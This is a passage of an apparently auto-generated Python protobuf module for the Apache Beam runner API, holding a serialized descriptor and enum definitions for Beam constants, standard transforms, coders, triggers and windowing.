urn:beam:transform:teststream:v1\x12\x34\n\x0bMAP_WINDOWS\x10\x06\x1a#\xa2\xb4\xfa\xc2\x05\x1d\x62\x65\x61m:transform:map_windows:v1\x12\x38\n\rMERGE_WINDOWS\x10\x07\x1a%\xa2\xb4\xfa\xc2\x05\x1f\x62\x65\x61m:transform:merge_windows:v1\"t\n\x14\x44\x65precatedPrimitives\x12&\n\x04READ\x10\x00\x1a\x1c\xa2\xb4\xfa\xc2\x05\x16\x62\x65\x61m:transform:read:v1\x12\x34\n\x0b\x43REATE_VIEW\x10\x01\x1a#\xa2\xb4\xfa\xc2\x05\x1d\x62\x65\x61m:transform:create_view:v1\"\xf2\x01\n\nComposites\x12<\n\x0f\x43OMBINE_PER_KEY\x10\x00\x1a\'\xa2\xb4\xfa\xc2\x05!beam:transform:combine_per_key:v1\x12>\n\x10\x43OMBINE_GLOBALLY\x10\x01\x1a(\xa2\xb4\xfa\xc2\x05\"beam:transform:combine_globally:v1\x12\x30\n\tRESHUFFLE\x10\x02\x1a!\xa2\xb4\xfa\xc2\x05\x1b\x62\x65\x61m:transform:reshuffle:v1\x12\x34\n\x0bWRITE_FILES\x10\x03\x1a#\xa2\xb4\xfa\xc2\x05\x1d\x62\x65\x61m:transform:write_files:v1\"\xd3\x04\n\x11\x43ombineComponents\x12:\n\x0e\x43OMBINE_PGBKCV\x10\x00\x1a&\xa2\xb4\xfa\xc2\x05 beam:transform:combine_pgbkcv:v1\x12R\n\x1a\x43OMBINE_MERGE_ACCUMULATORS\x10\x01\x1a\x32\xa2\xb4\xfa\xc2\x05,beam:transform:combine_merge_accumulators:v1\x12L\n\x17\x43OMBINE_EXTRACT_OUTPUTS\x10\x02\x1a/\xa2\xb4\xfa\xc2\x05)beam:transform:combine_extract_outputs:v1\x12R\n\x1a\x43OMBINE_PER_KEY_PRECOMBINE\x10\x03\x1a\x32\xa2\xb4\xfa\xc2\x05,beam:transform:combine_per_key_precombine:v1\x12\x62\n\"COMBINE_PER_KEY_MERGE_ACCUMULATORS\x10\x04\x1a:\xa2\xb4\xfa\xc2\x05\x34\x62\x65\x61m:transform:combine_per_key_merge_accumulators:v1\x12\\\n\x1f\x43OMBINE_PER_KEY_EXTRACT_OUTPUTS\x10\x05\x1a\x37\xa2\xb4\xfa\xc2\x05\x31\x62\x65\x61m:transform:combine_per_key_extract_outputs:v1\x12J\n\x16\x43OMBINE_GROUPED_VALUES\x10\x06\x1a.\xa2\xb4\xfa\xc2\x05(beam:transform:combine_grouped_values:v1\"\xc3\x02\n\x19SplittableParDoComponents\x12L\n\x15PAIR_WITH_RESTRICTION\x10\x00\x1a\x31\xa2\xb4\xfa\xc2\x05+beam:transform:sdf_pair_with_restriction:v1\x12\x44\n\x11SPLIT_RESTRICTION\x10\x01\x1a-\xa2\xb4\xfa\xc2\x05\'beam:transform:sdf_split_restriction:v1\x12N\n\x16PROCESS_KEYED_ELEMENTS\x10\x02\x1a\x32\xa2\xb4\xfa\xc2\x05,beam:transform:sdf_process_keyed_elements:v1\x12\x42\n\x10PROCESS_ELEMENTS\x10\x03\x1a,\xa2\xb4\xfa\xc2\x05&beam:transform:sdf_process_elements:v1\"\x82\x01\n\x16StandardSideInputTypes\"h\n\x04\x45num\x12/\n\x08ITERABLE\x10\x00\x1a!\xa2\xb4\xfa\xc2\x05\x1b\x62\x65\x61m:side_input:iterable:v1\x12/\n\x08MULTIMAP\x10\x01\x1a!\xa2\xb4\xfa\xc2\x05\x1b\x62\x65\x61m:side_input:multimap:v1\"\xe0\x01\n\x0bPCollection\x12\x13\n\x0bunique_name\x18\x01 \x01(\t\x12\x10\n\x08\x63oder_id\x18\x02 \x01(\t\x12\x45\n\nis_bounded\x18\x03 \x01(\x0e\x32\x31.org.apache.beam.model.pipeline.v1.IsBounded.Enum\x12\x1d\n\x15windowing_strategy_id\x18\x04 \x01(\t\x12\x44\n\x0c\x64isplay_data\x18\x05 \x01(\x0b\x32..org.apache.beam.model.pipeline.v1.DisplayData\"\x89\x06\n\x0cParDoPayload\x12\x41\n\x05\x64o_fn\x18\x01 \x01(\x0b\x32\x32.org.apache.beam.model.pipeline.v1.SdkFunctionSpec\x12@\n\nparameters\x18\x02 \x03(\x0b\x32,.org.apache.beam.model.pipeline.v1.Parameter\x12T\n\x0bside_inputs\x18\x03 \x03(\x0b\x32?.org.apache.beam.model.pipeline.v1.ParDoPayload.SideInputsEntry\x12T\n\x0bstate_specs\x18\x04 \x03(\x0b\x32?.org.apache.beam.model.pipeline.v1.ParDoPayload.StateSpecsEntry\x12T\n\x0btimer_specs\x18\x05 \x03(\x0b\x32?.org.apache.beam.model.pipeline.v1.ParDoPayload.TimerSpecsEntry\x12\x12\n\nsplittable\x18\x06 \x01(\x08\x12\x1c\n\x14restriction_coder_id\x18\x07 \x01(\t\x12\x1d\n\x15requests_finalization\x18\x08 \x01(\x08\x1a_\n\x0fSideInputsEntry\x12\x0b\n\x03key\x18\x01 \x01(\t\x12;\n\x05value\x18\x02 \x01(\x0b\x32,.org.apache.beam.model.pipeline.v1.SideInput:\x02\x38\x01\x1a_\n\x0fStateSpecsEntry\x12\x0b\n\x03key\x18\x01 \x01(\t\x12;\n\x05value\x18\x02 \x01(\x0b\x32,.org.apache.beam.model.pipeline.v1.StateSpec:\x02\x38\x01\x1a_\n\x0fTimerSpecsEntry\x12\x0b\n\x03key\x18\x01 \x01(\t\x12;\n\x05value\x18\x02 \x01(\x0b\x32,.org.apache.beam.model.pipeline.v1.TimerSpec:\x02\x38\x01\"\xad\x01\n\tParameter\x12\x44\n\x04type\x18\x01 \x01(\x0e\x32\x36.org.apache.beam.model.pipeline.v1.Parameter.Type.Enum\x1aZ\n\x04Type\"R\n\x04\x45num\x12\x0f\n\x0bUNSPECIFIED\x10\x00\x12\n\n\x06WINDOW\x10\x01\x12\x14\n\x10PIPELINE_OPTIONS\x10\x02\x12\x17\n\x13RESTRICTION_TRACKER\x10\x03\"\xfc\x02\n\tStateSpec\x12G\n\nvalue_spec\x18\x01 \x01(\x0b\x32\x31.org.apache.beam.model.pipeline.v1.ValueStateSpecH\x00\x12\x43\n\x08\x62\x61g_spec\x18\x02 \x01(\x0b\x32/.org.apache.beam.model.pipeline.v1.BagStateSpecH\x00\x12O\n\x0e\x63ombining_spec\x18\x03 \x01(\x0b\x32\x35.org.apache.beam.model.pipeline.v1.CombiningStateSpecH\x00\x12\x43\n\x08map_spec\x18\x04 \x01(\x0b\x32/.org.apache.beam.model.pipeline.v1.MapStateSpecH\x00\x12\x43\n\x08set_spec\x18\x05 \x01(\x0b\x32/.org.apache.beam.model.pipeline.v1.SetStateSpecH\x00\x42\x06\n\x04spec\"\"\n\x0eValueStateSpec\x12\x10\n\x08\x63oder_id\x18\x01 \x01(\t\"(\n\x0c\x42\x61gStateSpec\x12\x18\n\x10\x65lement_coder_id\x18\x01 \x01(\t\"z\n\x12\x43ombiningStateSpec\x12\x1c\n\x14\x61\x63\x63umulator_coder_id\x18\x01 \x01(\t\x12\x46\n\ncombine_fn\x18\x02 \x01(\x0b\x32\x32.org.apache.beam.model.pipeline.v1.SdkFunctionSpec\"<\n\x0cMapStateSpec\x12\x14\n\x0ckey_coder_id\x18\x01 \x01(\t\x12\x16\n\x0evalue_coder_id\x18\x02 \x01(\t\"(\n\x0cSetStateSpec\x12\x18\n\x10\x65lement_coder_id\x18\x01 \x01(\t\"l\n\tTimerSpec\x12G\n\x0btime_domain\x18\x01 \x01(\x0e\x32\x32.org.apache.beam.model.pipeline.v1.TimeDomain.Enum\x12\x16\n\x0etimer_coder_id\x18\x02 \x01(\t\"@\n\tIsBounded\"3\n\x04\x45num\x12\x0f\n\x0bUNSPECIFIED\x10\x00\x12\r\n\tUNBOUNDED\x10\x01\x12\x0b\n\x07\x42OUNDED\x10\x02\"\x98\x01\n\x0bReadPayload\x12\x42\n\x06source\x18\x01 \x01(\x0b\x32\x32.org.apache.beam.model.pipeline.v1.SdkFunctionSpec\x12\x45\n\nis_bounded\x18\x02 \x01(\x0e\x32\x31.org.apache.beam.model.pipeline.v1.IsBounded.Enum\"Z\n\x11WindowIntoPayload\x12\x45\n\twindow_fn\x18\x01 \x01(\x0b\x32\x32.org.apache.beam.model.pipeline.v1.SdkFunctionSpec\"v\n\x0e\x43ombinePayload\x12\x46\n\ncombine_fn\x18\x01 \x01(\x0b\x32\x32.org.apache.beam.model.pipeline.v1.SdkFunctionSpec\x12\x1c\n\x14\x61\x63\x63umulator_coder_id\x18\x02 \x01(\t\"\xca\x05\n\x11TestStreamPayload\x12\x10\n\x08\x63oder_id\x18\x01 \x01(\t\x12J\n\x06\x65vents\x18\x02 \x03(\x0b\x32:.org.apache.beam.model.pipeline.v1.TestStreamPayload.Event\x1a\x94\x04\n\x05\x45vent\x12\x66\n\x0fwatermark_event\x18\x01 \x01(\x0b\x32K.org.apache.beam.model.pipeline.v1.TestStreamPayload.Event.AdvanceWatermarkH\x00\x12q\n\x15processing_time_event\x18\x02 \x01(\x0b\x32P.org.apache.beam.model.pipeline.v1.TestStreamPayload.Event.AdvanceProcessingTimeH\x00\x12_\n\relement_event\x18\x03 \x01(\x0b\x32\x46.org.apache.beam.model.pipeline.v1.TestStreamPayload.Event.AddElementsH\x00\x1a)\n\x10\x41\x64vanceWatermark\x12\x15\n\rnew_watermark\x18\x01 \x01(\x03\x1a\x31\n\x15\x41\x64vanceProcessingTime\x12\x18\n\x10\x61\x64vance_duration\x18\x01 \x01(\x03\x1ah\n\x0b\x41\x64\x64\x45lements\x12Y\n\x08\x65lements\x18\x01 \x03(\x0b\x32G.org.apache.beam.model.pipeline.v1.TestStreamPayload.TimestampedElementB\x07\n\x05\x65vent\x1a@\n\x12TimestampedElement\x12\x17\n\x0f\x65ncoded_element\x18\x01 \x01(\x0c\x12\x11\n\ttimestamp\x18\x02 \x01(\x03\"\x9b\x03\n\x11WriteFilesPayload\x12@\n\x04sink\x18\x01 \x01(\x0b\x32\x32.org.apache.beam.model.pipeline.v1.SdkFunctionSpec\x12K\n\x0f\x66ormat_function\x18\x02 \x01(\x0b\x32\x32.org.apache.beam.model.pipeline.v1.SdkFunctionSpec\x12\x17\n\x0fwindowed_writes\x18\x03 \x01(\x08\x12\"\n\x1arunner_determined_sharding\x18\x04 \x01(\x08\x12Y\n\x0bside_inputs\x18\x05 \x03(\x0b\x32\x44.org.apache.beam.model.pipeline.v1.WriteFilesPayload.SideInputsEntry\x1a_\n\x0fSideInputsEntry\x12\x0b\n\x03key\x18\x01 \x01(\t\x12;\n\x05value\x18\x02 \x01(\x0b\x32,.org.apache.beam.model.pipeline.v1.SideInput:\x02\x38\x01\"f\n\x05\x43oder\x12@\n\x04spec\x18\x01 \x01(\x0b\x32\x32.org.apache.beam.model.pipeline.v1.SdkFunctionSpec\x12\x1b\n\x13\x63omponent_coder_ids\x18\x02 \x03(\t\"\xb7\x03\n\x0eStandardCoders\"\xa4\x03\n\x04\x45num\x12$\n\x05\x42YTES\x10\x00\x1a\x19\xa2\xb4\xfa\xc2\x05\x13\x62\x65\x61m:coder:bytes:v1\x12\x1e\n\x02KV\x10\x01\x1a\x16\xa2\xb4\xfa\xc2\x05\x10\x62\x65\x61m:coder:kv:v1\x12&\n\x06VARINT\x10\x02\x1a\x1a\xa2\xb4\xfa\xc2\x05\x14\x62\x65\x61m:coder:varint:v1\x12*\n\x08ITERABLE\x10\x03\x1a\x1c\xa2\xb4\xfa\xc2\x05\x16\x62\x65\x61m:coder:iterable:v1\x12$\n\x05TIMER\x10\x04\x1a\x19\xa2\xb4\xfa\xc2\x05\x13\x62\x65\x61m:coder:timer:v1\x12\x38\n\x0fINTERVAL_WINDOW\x10\x05\x1a#\xa2\xb4\xfa\xc2\x05\x1d\x62\x65\x61m:coder:interval_window:v1\x12\x34\n\rLENGTH_PREFIX\x10\x06\x1a!\xa2\xb4\xfa\xc2\x05\x1b\x62\x65\x61m:coder:length_prefix:v1\x12\x34\n\rGLOBAL_WINDOW\x10\x07\x1a!\xa2\xb4\xfa\xc2\x05\x1b\x62\x65\x61m:coder:global_window:v1\x12\x36\n\x0eWINDOWED_VALUE\x10\x08\x1a\"\xa2\xb4\xfa\xc2\x05\x1c\x62\x65\x61m:coder:windowed_value:v1\"\xf5\x04\n\x11WindowingStrategy\x12\x45\n\twindow_fn\x18\x01 \x01(\x0b\x32\x32.org.apache.beam.model.pipeline.v1.SdkFunctionSpec\x12I\n\x0cmerge_status\x18\x02 \x01(\x0e\x32\x33.org.apache.beam.model.pipeline.v1.MergeStatus.Enum\x12\x17\n\x0fwindow_coder_id\x18\x03 \x01(\t\x12;\n\x07trigger\x18\x04 \x01(\x0b\x32*.org.apache.beam.model.pipeline.v1.Trigger\x12S\n\x11\x61\x63\x63umulation_mode\x18\x05 \x01(\x0e\x32\x38.org.apache.beam.model.pipeline.v1.AccumulationMode.Enum\x12G\n\x0boutput_time\x18\x06 \x01(\x0e\x32\x32.org.apache.beam.model.pipeline.v1.OutputTime.Enum\x12Q\n\x10\x63losing_behavior\x18\x07 \x01(\x0e\x32\x37.org.apache.beam.model.pipeline.v1.ClosingBehavior.Enum\x12\x18\n\x10\x61llowed_lateness\x18\x08 \x01(\x03\x12N\n\x0eOnTimeBehavior\x18\t \x01(\x0e\x32\x36.org.apache.beam.model.pipeline.v1.OnTimeBehavior.Enum\x12\x1d\n\x15\x61ssigns_to_one_window\x18\n \x01(\x08\"\\\n\x0bMergeStatus\"M\n\x04\x45num\x12\x0f\n\x0bUNSPECIFIED\x10\x00\x12\x0f\n\x0bNON_MERGING\x10\x01\x12\x0f\n\x0bNEEDS_MERGE\x10\x02\x12\x12\n\x0e\x41LREADY_MERGED\x10\x03\"M\n\x10\x41\x63\x63umulationMode\"9\n\x04\x45num\x12\x0f\n\x0bUNSPECIFIED\x10\x00\x12\x0e\n\nDISCARDING\x10\x01\x12\x10\n\x0c\x41\x43\x43UMULATING\x10\x02\"Q\n\x0f\x43losingBehavior\">\n\x04\x45num\x12\x0f\n\x0bUNSPECIFIED\x10\x00\x12\x0f\n\x0b\x45MIT_ALWAYS\x10\x01\x12\x14\n\x10\x45MIT_IF_NONEMPTY\x10\x02\"P\n\x0eOnTimeBehavior\">\n\x04\x45num\x12\x0f\n\x0bUNSPECIFIED\x10\x00\x12\x0f\n\x0b\x46IRE_ALWAYS\x10\x01\x12\x14\n\x10\x46IRE_IF_NONEMPTY\x10\x02\"b\n\nOutputTime\"T\n\x04\x45num\x12\x0f\n\x0bUNSPECIFIED\x10\x00\x12\x11\n\rEND_OF_WINDOW\x10\x01\x12\x12\n\x0eLATEST_IN_PANE\x10\x02\x12\x14\n\x10\x45\x41RLIEST_IN_PANE\x10\x03\"l\n\nTimeDomain\"^\n\x04\x45num\x12\x0f\n\x0bUNSPECIFIED\x10\x00\x12\x0e\n\nEVENT_TIME\x10\x01\x12\x13\n\x0fPROCESSING_TIME\x10\x02\x12 \n\x1cSYNCHRONIZED_PROCESSING_TIME\x10\x03\"\x82\x0e\n\x07Trigger\x12H\n\tafter_all\x18\x01 \x01(\x0b\x32\x33.org.apache.beam.model.pipeline.v1.Trigger.AfterAllH\x00\x12H\n\tafter_any\x18\x02 \x01(\x0b\x32\x33.org.apache.beam.model.pipeline.v1.Trigger.AfterAnyH\x00\x12J\n\nafter_each\x18\x03 \x01(\x0b\x32\x34.org.apache.beam.model.pipeline.v1.Trigger.AfterEachH\x00\x12Z\n\x13\x61\x66ter_end_of_window\x18\x04 \x01(\x0b\x32;.org.apache.beam.model.pipeline.v1.Trigger.AfterEndOfWindowH\x00\x12_\n\x15\x61\x66ter_processing_time\x18\x05 \x01(\x0b\x32>.org.apache.beam.model.pipeline.v1.Trigger.AfterProcessingTimeH\x00\x12x\n\"after_synchronized_processing_time\x18\x06 \x01(\x0b\x32J.org.apache.beam.model.pipeline.v1.Trigger.AfterSynchronizedProcessingTimeH\x00\x12\x43\n\x06\x61lways\x18\x0c \x01(\x0b\x32\x31.org.apache.beam.model.pipeline.v1.Trigger.AlwaysH\x00\x12\x45\n\x07\x64\x65\x66\x61ult\x18\x07 \x01(\x0b\x32\x32.org.apache.beam.model.pipeline.v1.Trigger.DefaultH\x00\x12P\n\relement_count\x18\x08 \x01(\x0b\x32\x37.org.apache.beam.model.pipeline.v1.Trigger.ElementCountH\x00\x12\x41\n\x05never\x18\t \x01(\x0b\x32\x30.org.apache.beam.model.pipeline.v1.Trigger.NeverH\x00\x12J\n\nor_finally\x18\n \x01(\x0b\x32\x34.org.apache.beam.model.pipeline.v1.Trigger.OrFinallyH\x00\x12\x43\n\x06repeat\x18\x0b \x01(\x0b\x32\x31.org.apache.beam.model.pipeline.v1.Trigger.RepeatH\x00\x1aK\n\x08\x41\x66terAll\x12?\n\x0bsubtriggers\x18\x01 \x03(\x0b\x32*.org.apache.beam.model.pipeline.v1.Trigger\x1aK\n\x08\x41\x66terAny\x12?\n\x0bsubtriggers\x18\x01 \x03(\x0b\x32*.org.apache.beam.model.pipeline.v1.Trigger\x1aL\n\tAfterEach\x12?\n\x0bsubtriggers\x18\x01 \x03(\x0b\x32*.org.apache.beam.model.pipeline.v1.Trigger\x1a\x97\x01\n\x10\x41\x66terEndOfWindow\x12\x41\n\rearly_firings\x18\x01 \x01(\x0b\x32*.org.apache.beam.model.pipeline.v1.Trigger\x12@\n\x0clate_firings\x18\x02 \x01(\x0b\x32*.org.apache.beam.model.pipeline.v1.Trigger\x1aj\n\x13\x41\x66terProcessingTime\x12S\n\x14timestamp_transforms\x18\x01 \x03(\x0b\x32\x35.org.apache.beam.model.pipeline.v1.TimestampTransform\x1a!\n\x1f\x41\x66terSynchronizedProcessingTime\x1a\t\n\x07\x44\x65\x66\x61ult\x1a%\n\x0c\x45lementCount\x12\x15\n\relement_count\x18\x01 \x01(\x05\x1a\x07\n\x05Never\x1a\x08\n\x06\x41lways\x1a\x82\x01\n\tOrFinally\x12\x38\n\x04main\x18\x01 \x01(\x0b\x32*.org.apache.beam.model.pipeline.v1.Trigger\x12;\n\x07\x66inally\x18\x02 \x01(\x0b\x32*.org.apache.beam.model.pipeline.v1.Trigger\x1aH\n\x06Repeat\x12>\n\nsubtrigger\x18\x01 \x01(\x0b\x32*.org.apache.beam.model.pipeline.v1.TriggerB\t\n\x07trigger\"\x96\x02\n\x12TimestampTransform\x12L\n\x05\x64\x65lay\x18\x01 \x01(\x0b\x32;.org.apache.beam.model.pipeline.v1.TimestampTransform.DelayH\x00\x12Q\n\x08\x61lign_to\x18\x02 \x01(\x0b\x32=.org.apache.beam.model.pipeline.v1.TimestampTransform.AlignToH\x00\x1a\x1d\n\x05\x44\x65lay\x12\x14\n\x0c\x64\x65lay_millis\x18\x01 \x01(\x03\x1a)\n\x07\x41lignTo\x12\x0e\n\x06period\x18\x03 \x01(\x03\x12\x0e\n\x06offset\x18\x04 \x01(\x03\x42\x15\n\x13timestamp_transform\"\xe8\x01\n\tSideInput\x12G\n\x0e\x61\x63\x63\x65ss_pattern\x18\x01 \x01(\x0b\x32/.org.apache.beam.model.pipeline.v1.FunctionSpec\x12\x43\n\x07view_fn\x18\x02 \x01(\x0b\x32\x32.org.apache.beam.model.pipeline.v1.SdkFunctionSpec\x12M\n\x11window_mapping_fn\x18\x03 \x01(\x0b\x32\x32.org.apache.beam.model.pipeline.v1.SdkFunctionSpec\"8\n\x0b\x45nvironment\x12\x0b\n\x03url\x18\x01 \x01(\t\x12\x0b\n\x03urn\x18\x02 \x01(\t\x12\x0f\n\x07payload\x18\x03 \x01(\x0c\"\x9f\x01\n\x14StandardEnvironments\"\x86\x01\n\x0c\x45nvironments\x12$\n\x06\x44OCKER\x10\x00\x1a\x18\xa2\xb4\xfa\xc2\x05\x12\x62\x65\x61m:env:docker:v1\x12&\n\x07PROCESS\x10\x01\x1a\x19\xa2\xb4\xfa\xc2\x05\x13\x62\x65\x61m:env:process:v1\x12(\n\x08\x45XTERNAL\x10\x02\x1a\x1a\xa2\xb4\xfa\xc2\x05\x14\x62\x65\x61m:env:external:v1\"(\n\rDockerPayload\x12\x17\n\x0f\x63ontainer_image\x18\x01 \x01(\t\"\xb0\x01\n\x0eProcessPayload\x12\n\n\x02os\x18\x01 \x01(\t\x12\x0c\n\x04\x61rch\x18\x02 \x01(\t\x12\x0f\n\x07\x63ommand\x18\x03 \x01(\t\x12G\n\x03\x65nv\x18\x04 \x03(\x0b\x32:.org.apache.beam.model.pipeline.v1.ProcessPayload.EnvEntry\x1a*\n\x08\x45nvEntry\x12\x0b\n\x03key\x18\x01 \x01(\t\x12\r\n\x05value\x18\x02 \x01(\t:\x02\x38\x01\"h\n\x0fSdkFunctionSpec\x12=\n\x04spec\x18\x01 \x01(\x0b\x32/.org.apache.beam.model.pipeline.v1.FunctionSpec\x12\x16\n\x0e\x65nvironment_id\x18\x02 \x01(\t\",\n\x0c\x46unctionSpec\x12\x0b\n\x03urn\x18\x01 \x01(\t\x12\x0f\n\x07payload\x18\x03 \x01(\x0c\"\xa1\x04\n\x0b\x44isplayData\x12\x42\n\x05items\x18\x01 \x03(\x0b\x32\x33.org.apache.beam.model.pipeline.v1.DisplayData.Item\x1a\x46\n\nIdentifier\x12\x14\n\x0ctransform_id\x18\x01 \x01(\t\x12\x15\n\rtransform_urn\x18\x02 \x01(\t\x12\x0b\n\x03key\x18\x03 \x01(\t\x1a\x86\x02\n\x04Item\x12\x45\n\x02id\x18\x01 \x01(\x0b\x32\x39.org.apache.beam.model.pipeline.v1.DisplayData.Identifier\x12\x46\n\x04type\x18\x02 \x01(\x0e\x32\x38.org.apache.beam.model.pipeline.v1.DisplayData.Type.Enum\x12#\n\x05value\x18\x03 \x01(\x0b\x32\x14.google.protobuf.Any\x12)\n\x0bshort_value\x18\x04 \x01(\x0b\x32\x14.google.protobuf.Any\x12\r\n\x05label\x18\x05 \x01(\t\x12\x10\n\x08link_url\x18\x06 \x01(\t\x1a}\n\x04Type\"u\n\x04\x45num\x12\x0f\n\x0bUNSPECIFIED\x10\x00\x12\n\n\x06STRING\x10\x01\x12\x0b\n\x07INTEGER\x10\x02\x12\t\n\x05\x46LOAT\x10\x03\x12\x0b\n\x07\x42OOLEAN\x10\x04\x12\r\n\tTIMESTAMP\x10\x05\x12\x0c\n\x08\x44URATION\x10\x06\x12\x0e\n\nJAVA_CLASS\x10\x07\"\x92\x07\n\x15MessageWithComponents\x12\x41\n\ncomponents\x18\x01 \x01(\x0b\x32-.org.apache.beam.model.pipeline.v1.Components\x12\x39\n\x05\x63oder\x18\x02 \x01(\x0b\x32(.org.apache.beam.model.pipeline.v1.CoderH\x00\x12L\n\x0f\x63ombine_payload\x18\x03 \x01(\x0b\x32\x31.org.apache.beam.model.pipeline.v1.CombinePayloadH\x00\x12O\n\x11sdk_function_spec\x18\x04 \x01(\x0b\x32\x32.org.apache.beam.model.pipeline.v1.SdkFunctionSpecH\x00\x12I\n\x0epar_do_payload\x18\x06 \x01(\x0b\x32/.org.apache.beam.model.pipeline.v1.ParDoPayloadH\x00\x12\x43\n\nptransform\x18\x07 \x01(\x0b\x32-.org.apache.beam.model.pipeline.v1.PTransformH\x00\x12\x45\n\x0bpcollection\x18\x08 \x01(\x0b\x32..org.apache.beam.model.pipeline.v1.PCollectionH\x00\x12\x46\n\x0cread_payload\x18\t \x01(\x0b\x32..org.apache.beam.model.pipeline.v1.ReadPayloadH\x00\x12\x42\n\nside_input\x18\x0b \x01(\x0b\x32,.org.apache.beam.model.pipeline.v1.SideInputH\x00\x12S\n\x13window_into_payload\x18\x0c \x01(\x0b\x32\x34.org.apache.beam.model.pipeline.v1.WindowIntoPayloadH\x00\x12R\n\x12windowing_strategy\x18\r \x01(\x0b\x32\x34.org.apache.beam.model.pipeline.v1.WindowingStrategyH\x00\x12H\n\rfunction_spec\x18\x0e \x01(\x0b\x32/.org.apache.beam.model.pipeline.v1.FunctionSpecH\x00\x42\x06\n\x04root\"\x86\x05\n\x16\x45xecutableStagePayload\x12\x43\n\x0b\x65nvironment\x18\x01 \x01(\x0b\x32..org.apache.beam.model.pipeline.v1.Environment\x12\r\n\x05input\x18\x02 \x01(\t\x12Z\n\x0bside_inputs\x18\x03 \x03(\x0b\x32\x45.org.apache.beam.model.pipeline.v1.ExecutableStagePayload.SideInputId\x12\x12\n\ntransforms\x18\x04 \x03(\t\x12\x0f\n\x07outputs\x18\x05 \x03(\t\x12\x41\n\ncomponents\x18\x06 \x01(\x0b\x32-.org.apache.beam.model.pipeline.v1.Components\x12Z\n\x0buser_states\x18\x07 \x03(\x0b\x32\x45.org.apache.beam.model.pipeline.v1.ExecutableStagePayload.UserStateId\x12Q\n\x06timers\x18\x08 \x03(\x0b\x32\x41.org.apache.beam.model.pipeline.v1.ExecutableStagePayload.TimerId\x1a\x37\n\x0bSideInputId\x12\x14\n\x0ctransform_id\x18\x01 \x01(\t\x12\x12\n\nlocal_name\x18\x02 \x01(\t\x1a\x37\n\x0bUserStateId\x12\x14\n\x0ctransform_id\x18\x01 \x01(\t\x12\x12\n\nlocal_name\x18\x02 \x01(\t\x1a\x33\n\x07TimerId\x12\x14\n\x0ctransform_id\x18\x01 \x01(\t\x12\x12\n\nlocal_name\x18\x02 \x01(\t:6\n\x08\x62\x65\x61m_urn\x12!.google.protobuf.EnumValueOptions\x18\xc4\xa6\xafX \x01(\t:;\n\rbeam_constant\x12!.google.protobuf.EnumValueOptions\x18\xc5\xa6\xafX \x01(\tB;\n!org.apache.beam.model.pipeline.v1B\tRunnerApiZ\x0bpipeline_v1b\x06proto3')
,
dependencies=[google_dot_protobuf_dot_any__pb2.DESCRIPTOR,google_dot_protobuf_dot_descriptor__pb2.DESCRIPTOR,])
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
BEAM_URN_FIELD_NUMBER = 185324356
beam_urn = _descriptor.FieldDescriptor(
name='beam_urn', full_name='org.apache.beam.model.pipeline.v1.beam_urn', index=0,
number=185324356, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=True, extension_scope=None,
options=None)
BEAM_CONSTANT_FIELD_NUMBER = 185324357
beam_constant = _descriptor.FieldDescriptor(
name='beam_constant', full_name='org.apache.beam.model.pipeline.v1.beam_constant', index=1,
number=185324357, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=True, extension_scope=None,
options=None)
_BEAMCONSTANTS_CONSTANTS = _descriptor.EnumDescriptor(
name='Constants',
full_name='org.apache.beam.model.pipeline.v1.BeamConstants.Constants',
filename=None,
file=DESCRIPTOR,
values=[
_descriptor.EnumValueDescriptor(
name='MIN_TIMESTAMP_MILLIS', index=0, number=0,
options=_descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\252\264\372\302\005\021-9223372036854775')),
type=None),
_descriptor.EnumValueDescriptor(
name='MAX_TIMESTAMP_MILLIS', index=1, number=1,
options=_descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\252\264\372\302\005\0209223372036854775')),
type=None),
_descriptor.EnumValueDescriptor(
name='GLOBAL_WINDOW_MAX_TIMESTAMP_MILLIS', index=2, number=2,
options=_descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\252\264\372\302\005\0209223371950454775')),
type=None),
],
containing_type=None,
options=None,
serialized_start=140,
serialized_end=316,
)
_sym_db.RegisterEnumDescriptor(_BEAMCONSTANTS_CONSTANTS)
_STANDARDPTRANSFORMS_PRIMITIVES = _descriptor.EnumDescriptor(
name='Primitives',
full_name='org.apache.beam.model.pipeline.v1.StandardPTransforms.Primitives',
filename=None,
file=DESCRIPTOR,
values=[
_descriptor.EnumValueDescriptor(
name='PAR_DO', index=0, number=0,
options=_descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\005\033urn:beam:transform:pardo:v1')),
type=None),
_descriptor.EnumValueDescriptor(
name='FLATTEN', index=1, number=1,
options=_descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\005\031beam:transform:flatten:v1')),
type=None),
_descriptor.EnumValueDescriptor(
name='GROUP_BY_KEY', index=2, number=2,
options=_descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\005\036beam:transform:group_by_key:v1')),
type=None),
_descriptor.EnumValueDescriptor(
name='IMPULSE', index=3, number=3,
options=_descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\005\031beam:transform:impulse:v1')),
type=None),
_descriptor.EnumValueDescriptor(
name='ASSIGN_WINDOWS', index=4, number=4,
options=_descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\005\035beam:transform:window_into:v1')),
type=None),
_descriptor.EnumValueDescriptor(
name='TEST_STREAM', index=5, number=5,
options=_descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\005 urn:beam:transform:teststream:v1')),
type=None),
_descriptor.EnumValueDescriptor(
name='MAP_WINDOWS', index=6, number=6,
options=_descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\005\035beam:transform:map_windows:v1')),
type=None),
_descriptor.EnumValueDescriptor(
name='MERGE_WINDOWS', index=7, number=7,
options=_descriptor._ParseOptions(descriptor_pb2.EnumValueOptions(), _b('\242\264\372\302\005\037beam:transform:merge_windows:v1')),
type=None),
],
containing_type=None,
options=None,
serialized_start=1912,
serialized_end=2345,
)
_sym_db.RegisterEnumDescriptor(_STANDARDPTRANSFORMS_PRIMITIVES)
_STANDARDPTRANSFORMS_DEPRECATEDPRIMITIVES = _descriptor.EnumDescriptor(
name='DeprecatedPrimitives',
